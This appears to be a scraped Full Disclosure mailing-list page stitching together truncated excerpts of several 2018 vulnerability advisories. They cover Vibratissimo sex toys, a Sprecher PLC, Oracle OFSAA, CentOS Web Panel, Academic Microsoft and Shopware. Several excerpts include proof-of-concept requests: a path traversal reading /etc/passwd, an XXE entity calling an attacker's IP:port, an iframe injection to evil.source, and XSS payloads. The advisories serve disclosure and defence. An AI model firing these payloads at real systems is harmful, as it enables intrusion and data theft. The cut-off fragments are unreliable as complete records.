We have published an accompanying blog post to this technical advisory with
further information:

https://www.sec-consult.com/en/blog/2018/02/internet-of-dildos-a-long-way-to-a-vibrant-future-from-iot-to-iod/index.html


SEC Consult Vulnerability Lab Security Advisory < 20180201-0 >
===
  title: Multiple critical vulnerabilities
product: Whole Vibratissimo Smart Sex Toy product range
 vulnerable version: <6.3 (iOS), <6.2.2 (Android), <2.0.2 (Firmware)
  fixed version: 6.3 (iOS), 6.2.2 (Android), 2.0.2 (Firmware)
 CVE number: -
 impact: critical
   homepage: http://www.vibratissimo.com
  found: 2017-10-01
 by: W. Schober (Office Vienna)
     SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"Control with Vibratissimo your AMOR Toy on your smartphone and get even more
features by the app. With Vibratissimo you are open to new and exciting
opportunities, whether you are in the same room or on different continents."

Source: http://www.vibratissimo.com/en/index.html


Business recommendation:

SEC Consult highly recommends to update the app to the newest version available
in the appstore. Furthermore the password, which was used within the app,
should be changed immediately. If the password was used for multiple services,
all passwords should be changed. To get rid of issue number 3 (Unauthenticated
Bluetooth LE Connections) a firmware update can be applied. To apply the
firmware update the devices have to be sent to Amor Gummiwaren GmbH.


Vulnerability overview/description:
---
1) Customer Database Credential Disclosure
The credentials for the whole Vibratissimo database environment were exposed on
the internet. Due to the fact, that the PHPMyAdmin interface was exposed as 
well,
an attacker could have been able to connect to the database and dump the whole
data set. The dataset contains for example the following data:

- Usernames
- Session Tokens
- Cleartext passwords
- chat histories
- explicit image galleries, which are created by the users themselves


2) Exposed administrative interfaces on the internet
An administrative interface for databases was available without any filtering to
the whole internet. In combination with other vulnerabilities an attacker
could have been able to get access to the whole database data and even take over
the server.


3) Cleartext Storage of Passwords
The user passwords were stored unhashed in cleartext in the database.
If an attacker gained access to the database (e.g. via credential disclosure),
he could have been able to retrieve the plaintext passwords of users and abuse
their privileges in the system.


4) Unauthenticated Bluetooth LE Connections
The sex toys are connected without prior authentication to the app, which is the
standard use case. For example one of the identified Bluetooth services allows
to read the current device temperature. Other services, which can be
accessed without prior authentication are:

-) Setting the "intensity" of the current vibration pattern
-) Reading various values (Temperature, etc)


5) Insufficient Authentication Mechanism
The android application is using a type of authentication, which is against
known best practice. The username and password are sent with every
request to the server to authenticate and authorise the request. There is no
session management implemented. However, the authentication credentials are
transmitted via an encrypted SSL/TLS connection.


6) Insecure Direct Object Reference
Due to flaws in the authorization schema, an authorization bypass vulnerability
allows an attacker to get access to restricted functions and resources. In this
case a user is able to set a profile picture by uploading a provided image. The
image is stored on the Vibratissimo server and renamed. All images are renamed
by incrementing a global number and assigning this number as the name of the
image (e.g 200.png). An attacker is now able to iterate through those images and
dump personal user images containing partially explicit content. The image can
even be accessed if the profile has been set to "hidden" by the user.


7) Missing Authentication in Remote Control
The mobile apps allow their users to use a feature called quick control.
This feature allows to send a link with a unique ID to an email address or a
telephone via SMS to get direct control of the sex toy over the internet.
This wouldn't be a problem in gen

[FD] SEC Consult SA-20180131-0 :: Multiple Vulnerabilities in Sprecher Automation SPRECON-E-C, PU-2433

2018-01-30 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20180131-0 >
===
  title: Multiple Vulnerabilities
product: Sprecher Automation SPRECON-E-C, PU-2433
 vulnerable version: <8.49 (most vulnerabilities, see "Vulnerable version" for
 details)
  fixed version: 8.49 (most vulnerabilities, see "Solution" for details)
 CVE number: -
 impact: Medium
   homepage: https://www.sprecher-automation.com
  found: 2017-08-15
 by: T. Weber, C.A. (Office Vienna)
     SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"Sprecher Automation GmbH offers switchgears and automation solutions
for energy, industry and infrastructure processes. Our customers are
power utilities, industries, transportation companies, municipal
utilities and public institutions.

Company-own developments and cooperations with technology
partners lead to a unique product portfolio consisting of traditional
electrical technologies as well as high-tech electronics."

Source: https://www.sprecher-automation.com/en/


Business recommendation:

SEC Consult recommends to immediately patch the systems and follow the
hardening guide provided by the vendor (SEC Consult did not have access to the
hardening guide in order to review it).

A thorough security review should be performed by security professionals as
further security issues might exist within the product.


Vulnerability overview/description:
---
1) Authenticated Path Traversal Vulnerability
The web interface of the Sprecher PLC suffers from a path traversal
vulnerability. A user which is authenticated on the web interface,
which is intended as read-only interface, can download files with the
permissions of the webserver (www-data).

Files like "/etc/shadow" are not readable for the webserver.


2) Client-Side Password Hashing
The password hashes which are stored on the system can be directly
used to authenticate on the web interface (pass-the-hash) since the password
is hashed in the browser of the user during login.


3) Missing Authentication
The PLC exposes a Telnet management service on TCP port 2048.
This interface can be used to control the PLC and does not require any
authentication.


4) Permanent Denial of Service via Portscan
An aggressive TCP SYN scan on a large amount of ports triggers a denial
of service of the PLC service. This results in an persistent DoS of the
standby PLC in an active - standby pair. Manual operator intervention is
required to restore service availability.


5) Outdated Linux Kernel
An ancient Linux kernel version with a high number of known security weaknesses
is used for the PLC base operating system.


Proof of concept:
-
1) Authenticated Path Traversal Vulnerability
Reading "passwd" is possible by triggering the following request:
---
GET /webserver/cgi-bin/spre.cgi?4_1=../../../../../../../etc/passwd HTTP/1.1
Host: 
Cookie: sid=
Connection: close
Upgrade-Insecure-Requests: 1
---

The file is directly fetched from the system:
---
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:100:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/spool/mail:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
operator:x:37:37:Operator:/var:/bin/sh
haldaemon:x:68:68:hald:/:/bin/sh
dbus:x:81:81:dbus:/var/run/dbus:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
sshd:x:103:99:Operator:/var:/bin/sh
[...]
---


2) Client-Side Password Hashing
The passwords are hashed in JavaScript before they are transmitted to the
device. Therefore the hash is as good as the password.

The following request shows a login process:
---
POST /webserver/cgi-bin/spre.cgi HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json
Accept-Language: de
Content-Type: application/x-www-form-urlencoded
If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
Referer: http:///We

[FD] Banknotes Misproduction security & biometric weakness

2018-01-30 Thread Vulnerability Lab 
Document Title:
===
Banknotes Misproduction security & biometric weakness


References:
===
https://www.vulnerability-lab.com/get_content.php?id=2105

Download: 
https://www.vulnerability-lab.com/resources/documents/7692342363856723534.rar

Vulnerability Magazine: 
https://www.vulnerability-db.com/?q=articles/2018/01/28/banknotes-misproduction-security-biometric-weakness

Video: https://www.vulnerability-lab.com/get_content.php?id=2106

Other Reference(s): 
https://threatpost.com/lenovo-fixes-hardcoded-password-flaw-impacting-thinkpad-fingerprint-scanners/129680/



Release Date:
=
2018-01-29


Vulnerability Laboratory ID (VL-ID):

2105


Common Vulnerability Scoring System:

6


Vulnerability Class:

Insecure Configuration Management


Current Estimated Price:

10.000€ - 25.000€


Vulnerability Disclosure Timeline:
==
2018-01-29: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Bulletins


Severity Level:
===
High


Technical Details & Description:

In the last months we reviewed the new 20€ & 50€ Banknotes of the European 
Central Bank. One of our core team researchers identified 
that for the security sign of the holograms are different components in usage. 
The security signs are build by the European Central 
Bank with several high profile elements in the signs to ensure, that the 
banknotes has a serious level of protection again fraud or 
fake money. After processing some time to identify an impact, we were finally 
able to identify the following security problematic ...


Credits & Authors:
==
Benjamin Kunz Mejri - Vulnerability-Lab Core Team - 
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Contact: [resea...@vulnerability-lab.com] 
Cooperation: Forum für Cyber Sicherheit e.V. - Deutschland


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of 
business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do 
not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not 
approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for 
criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- 
hacker/analyst/researcher groups or individuals. We do not publish trade 
researcher mails, 
phone numbers, conversations or anything else to journalists, investigative 
authorities or private individuals. 

Domains:www.vulnerability-lab.com   - www.vulnerability-db.com  
- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php- 
vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register.php
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php- 
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab 
- youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, 
resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other media, are reserved by 
Vulnerability Lab Research Team or its suppliers. All pictures, texts, 
advisories, source code, videos and other information on this website is 
trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, 
modify, use or edit our material contact (admin@) to get an ask permission.

Copyright © 2018 | Vulnerability Laboratory 
- [Evolution Security GmbH]™

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] SEC Consult SA-20180123-0 :: XXE & Reflected XSS in Oracle Financial Services Analytical Applications

2018-01-22 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20180123-0 >
===
  title: XXE & Reflected XSS
product: Oracle Financial Services Analytical Applications
 vulnerable version: 7.3.5.x, 8.0.x
  fixed version: Oracle CPU January 2018
 CVE number: CVE-2018-2660, CVE-2018-2661
 impact: High
   homepage: http://www.oracle.com/us/products/applications/
 financial-services/analytical-applications/index.html
  found: 2017-06-15
 by: Mohammad Shah Bin Mohammad Esa, Samandeep Singh
 (Office Singapore)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"Oracle is the unchallenged leader in Financial Services, with an
integrated, best-in-class, end-to-end solution of intelligent software
and powerful hardware designed to meet every financial service need."

Source: http://www.oracle.com/us/products/applications/
financial-services/analytical-applications/index.html


Business recommendation:

By exploiting the XXE vulnerability, an attacker can get read access to the
filesystem of the user's system using the OFSAA web application and thus obtain
sensitive information from the system. It is also possible to bypass input
validation checks in order to inject JavaScript code.

SEC Consult recommends to immediately install the patched version.
Furthermore, a thorough security review should be performed by security
professionals to identify potential further security issues.


Vulnerability overview/description:
---
1) XML eXternal Entity (XXE) Injection (CVE-2018-2660)
The web application allows users to import XML files. An attacker can import a
specially crafted XML file and exploit the XXE vulnerability within the 
application.

2) Reflected Cross Site Scripting (CVE-2018-2661)
This vulnerability allows an unauthenticated user to inject malicious client
side script which will be executed in the browser of a user if he visits
the manipulated URL.


Proof of concept:
-
1) XML External Entity Injection (XXE) (CVE-2018-2660)
For example, by importing the following XML code in the "Business Model Upload"
function a connection request from the server to the attacker's system will be 
made.


 
   http://[IP:port]/"; >]>&xxe;

IP:port = IP address and port where the attacker is listening for connections

Furthermore some files can be exfiltrated to remote servers via the
techniques described in:

https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf
http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf


2) Reflected Cross Site Scripting (CVE-2018-2661)
The following parameters have been found to be vulnerable to
reflected cross site scripting attacks. Furthermore, there are many more
vulnerable parameters.

The following payload shows a simple alert message box:
URL : http://$DOMAIN/OFSAA/admin/PopupAlert_H5.jsp?winTitle=
METHOD  : GET
PAYLOAD :
winTitle=a%3C/title%3E%3Cimg%0A%20src=x%20onerror=%22prompt%0A%28%27SEC%20consult%20-%20XSS%27%29%22%3E

URL : http://$DOMAIN/OFSAA/fsapps/common/MM_PageOpener_crossBrowser.jsp?
url=fetchErrorMessages.action&infodom=OCBCOFSAASG&formCode=summarypage&errorMessage={62}~
METHOD  : GET
PAYLOAD : errorMessage={62}~%27;alert%0a(0);//&aType=DeleteConfirm


Vulnerable / tested versions:
-
The following version has been tested which was the most recent one when
the vulnerabilities were discovered:

* Oracle Financial Services Analytical Applications 8.0.4.0.0

According to Oracle all versions 7.3.5.x and 8.0.x are affected before CPU
January 2018.


Vendor contact timeline:

2017-09-11: Contacting vendor through encrypted email (secalert...@oracle.com)
2017-09-20: Vendor requested to postpone the release date
2018-01-13: Vendor informed that Critical Patch Update that includes fixes
of reported issues will be released on 2018-01-16.
CVE-2018-2660 & CVE-2018-2661 were assigned for the issues
2018-01-23: Public disclosure of advisory


Solution:
-
Apply patch update in the January 2018 Critical Patch Update:
http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html


Workaround:
---
None


Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~

[FD] CentOS Web Panel v0.9.8.12 - Remote SQL Injection Vulnerabilities

2018-01-22 Thread Vulnerability Lab 
AD!]
   Response Header:
  Date[Mon, 25 Apr 2016 12:32:33 GMT]
  Server[Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips PHP/5.4.27]
  X-Powered-By[PHP/5.4.27]
  Expires[Thu, 19 Nov 1981 08:52:00 GMT]
  Cache-Control[no-store, no-cache, must-revalidate, post-check=0, 
pre-check=0]
  Pragma[no-cache]
  Keep-Alive[timeout=5, max=100]
  Connection[Keep-Alive]
  Transfer-Encoding[chunked]
  Content-Type[text/html]


Reference(s):
http://cwp.localhost:2030/
http://cwp.localhost:2030/index.php
http://cwp.localhost:2030/index.php?module=list_domains


Security Risk:
==
The security risk of the remote sql-injection web vulnerability in the centos 
web panel application is estimated as high. (CVSS 7.5)


Credits & Authors:
==
Vulnerability-Lab [ad...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, 
including the warranties of merchantability and capability for a particular 
purpose. Vulnerability-Lab or its suppliers are not liable in any case of 
damage, 
including direct, indirect, incidental, consequential loss of business profits 
or special damages, even if Vulnerability-Lab or its suppliers have been 
advised 
of the possibility of such damages. Some states do not allow the exclusion or 
limitation of liability for consequential or incidental damages so the 
foregoing 
limitation may not apply. We do not approve or encourage anybody to break any 
licenses, policies, deface websites, hack into databases or trade with stolen 
data.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
- www.evolution-sec.com
Contact:ad...@vulnerability-lab.com - 
resea...@vulnerability-lab.com- 
ad...@evolution-sec.com
Section:magazine.vulnerability-lab.com  - 
vulnerability-lab.com/contact.php - 
evolution-sec.com/contact
Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab 
- youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php- 
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php- 
vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. Permission to 
electronically 
redistribute this alert in its unmodified form is granted. All other rights, 
including the use of other media, are reserved by Vulnerability-Lab Research 
Team or 
its suppliers. All pictures, texts, advisories, source code, videos and other 
information on this website is trademark of vulnerability-lab team & the 
specific 
authors or managers. To record, list, modify, use or edit our material contact 
(admin@ or resea...@vulnerability-lab.com) to get a ask permission.

Copyright © 2018 | Vulnerability Laboratory 
- [Evolution Security GmbH]™

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Acadmic Microsoft - API Query Filter Cross Site Scripting Vulnerability

2018-01-21 Thread Vulnerability Lab 
%20http%3A%2F%2Fevil.source%3E%3C%2Fiframe%3E%40&correlationId=undefined
 HTTP/1.1
Host: academic.microsoft.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: */*
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
Referer: https://academic.microsoft.com/
Cookie: 
utag_main=v_id:015b543cdafd00b14436aadab8900104400390090086e$_sn:1$_ss:0$_st:1491768750447$ses_id:1491766926079%3B
exp-session$_pn:2%3Bexp-session; s_norv=1491766950419-New; 
s_vnum=1493611200871%26vn%3D1; s_invisit=true; s_dslv=1491766950423; 
s_dslv_s=First%20Visit; s_ppn=mpdacad%3Aen-us%3Aregister; 
s_ppvl=mpdacad%253Aen-us%253Alogin%2C100%2C89%2C643%2C1355%2C621%2C1366%2C768%2C1%2CP;
 
s_ppv=mpdacad%253Aen-us%253Aregister%2C100%2C92%2C675%2C1355%2C621%2C1366%2C768%2C1%2CP;
 s_fid=2DCC642E0324D787-3D30FA055450DC93; 
s_cc=true; 
s_sq=msstompdacad%3D%2526c.%2526a.%2526activitymap.%2526page%253Dmpdacad%25253Aen-
us%25253Aregister%2526link%253DSign%252520up%252520with%252520Microsoft%252520account%2526region%253Dmain%2526pageIDType%253D1%2526.
activitymap%2526.a%2526.c%2526pid%253Dmpdacad%25253Aen-us%25253Aregister%2526pidt%253D1%2526oid%253DSign%252520up%252520with%252520
Microsoft%252520account%2526oidt%253D3%2526ot%253DSUBMIT; 
AMCV_EA76ADE95776D2EC7F000101%40AdobeOrg=
-179204249%7CMCMID%7C28933220378893493633963593270039587370; 
MSFPC=ID=d9c52c60bfa3454780dd8fed1ee6d500&CS=1&LV=201704&V=1; 
msacademic=da629bfe-3e6a-4e63-8c85-d684ae83d1d6
Connection: close
-
Response:
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sun, 09 Apr 2017 12:55:23 GMT
Connection: close
Content-Length: 230



Reference(s):
https://academic.microsoft.com/
https://academic.microsoft.com/api/
https://academic.microsoft.com/api/search/
https://academic.microsoft.com/api/search/GetFilters


Solution - Fix & Patch:
===
2018-**-**: Security Acknowledgements (Microsoft Security Response Center Team) 
- Unresponsive


Security Risk:
==
The security risk of the non-persistent cross site scripting web vulnerability 
is estimated as medium. (CVSS 3.2)


Credits & Authors:
==
Vulnerability Laboratory [Research Team] - Lawrence Amer 
(http://lawrenceamer.me) 
Profile: https://www.vulnerability-lab.com/show.php?user=Lawrence Amer


Disclaimer & Information:
=========
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of 
business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do 
not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not 
approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for 
criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- 
hacker/analyst/researcher groups or individuals. We do not publish trade 
researcher mails, 
phone numbers, conversations or anything else to journalists, investigative 
authorities or private individuals. 

Domains:www.vulnerability-lab.com   - www.vulnerability-db.com  
- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php- 
vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register.php
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php- 
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab 
- youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, 
resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other media, are reserved by 
Vulnerability Lab Research Team or its suppliers. All pictures, texts, 
advisories, source code, videos and other information on this website is 
trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, 
modify, use or edit our material contact (admin@) to get an ask permission.

Copyright © 2018 | Vulnerability La

[FD] CentOS Web Panel v0.9.8.12 - Non-Persistent Cross Site Scripting Vulnerabilities

2018-01-19 Thread Vulnerability Lab 
tacks.
Escape the output content of the error exception for invalid inputs to prevent 
the execution point of the client-side vulnerability.


Security Risk:
==
The security risk of the client-side cross site scripting web vulnerability in 
the centos web panel is estimated as medium (CVSS 3.3).


Credits & Authors:
==
Benjamn Kunz Mejri (Vulnerability Laboratory) - 
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of 
business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do 
not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not 
approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for 
criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- 
hacker/analyst/researcher groups or individuals. We do not publish trade 
researcher mails, 
phone numbers, conversations or anything else to journalists, investigative 
authorities or private individuals. 

Domains:www.vulnerability-lab.com   - www.vulnerability-db.com  
- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php- 
vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register.php
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php- 
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab 
- youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, 
resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other media, are reserved by 
Vulnerability Lab Research Team or its suppliers. All pictures, texts, 
advisories, source code, videos and other information on this website is 
trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, 
modify, use or edit our material contact (admin@) to get an ask permission.

Copyright © 2018 | Vulnerability Laboratory 
- [Evolution Security GmbH]™

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Shopware 5.2.5 & v5.3 - Multiple Cross Site Scripting Web Vulnerabilities

2018-01-19 Thread Vulnerability Lab 
ulnerability can be patched by a secure parse of the customer (kunden) 
and orders (bestellungen) context listings.
Parse or escape the context and disallow special chars during the registration 
or add to prevent further script code injection attacks.

The vulnerability can be resolved by an update to version 5.3.4 that is 
delivered by the manufacturer. The issue risk is marked as moderate.



Security Risk:
==
The security risk of the stored cross site scripting vulnerabilities in the 
shopware cms are estimated as medium. (CVSS 4.4)


Credits & Authors:
==
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
[http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.]


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of 
business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do 
not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not 
approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for 
criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- 
hacker/analyst/researcher groups or individuals. We do not publish trade 
researcher mails, 
phone numbers, conversations or anything else to journalists, investigative 
authorities or private individuals. 

Domains:www.vulnerability-lab.com   - www.vulnerability-db.com  
- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php- 
vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register.php
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php    - 
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab 
        - youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, 
resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other media, are reserved by 
Vulnerability Lab Research Team or its suppliers. All pictures, texts, 
advisories, source code, videos and other information on this website is 
trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, 
modify, use or edit our material contact (admin@) to get an ask permission.

Copyright © 2018 | Vulnerability Laboratory 
- [Evolution Security GmbH]™

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CentOS Web Panel v0.9.8.12 - Multiple Persistent Web Vulnerabilities

2018-01-19 Thread Vulnerability Lab 
; WOW64; rv:45.0) Gecko/20100101 
Firefox/45.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Referer[http://localhost:2030/index.php?module=mail_add-new]
  
Cookie[cwpsrv-3cc0cea69668d490e1029c2a41ce5df3=8fnvi0bqgjj162mqklruu8clq5; 
PHPSESSID=8dsrha0ivd80kkgukvklgvmct1]
  Connection[keep-alive]
   POST-Daten:
  ifpost[yes]
  email_address[%3E%22%3CPAYLOAD INJECTION POINT!+src]
  domain[test-domain.com]
  password[%3E%22%3CPAYLOAD INJECTION POINT!+src]
   Response Header:
  Server[Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips PHP/5.4.27]
  X-Powered-By[PHP/5.4.27]
  Keep-Alive[timeout=5, max=100]
  Connection[Keep-Alive]
  Transfer-Encoding[chunked]
  Content-Type[text/html]


PoC: POST via add Mailbox in email input 

Email domain test-domain.com created.
Mailbox a>"<%3E%22%3CPERSISTENT SCRIPT CODE PAYLOAD 
EXECUTION!+src>@test-domain.com created.
Create a New Email Account or Forwarder (MailBox/Forwarder)
Here you can create a new email account or forwarder.






Create a New Email Account 
(MailBox)

Minimize






Reference(s):
http://localhost:2030/index.php?module=mail_add-new 


Solution - Fix & Patch:
===
The vulnerabilities can be patched by a sanitize in the vulnerable `id` and 
`email address` parameters of the index.php file POST method request. 
Disallow usage of special chars and restrict the parameter input to prevent 
script code injection attacks. Filter in the output error location 
or the item listing the vulnerable location were the code point occurs.


Security Risk:
==
The security risk of the application-side input validation vulnerabilities in 
the web-application are estimated as medium. (CVSS 4.4)


Credits & Authors:
==
Benjamin K.M. [b...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of 
business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do 
not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not 
approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for 
criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- 
hacker/analyst/researcher groups or individuals. We do not publish trade 
researcher mails, 
phone numbers, conversations or anything else to journalists, investigative 
authorities or private individuals. 

Domains:www.vulnerability-lab.com   - www.vulnerability-db.com  
- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php- 
vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register.php
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php- 
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab 
- youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, 
resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other media, are reserved by 
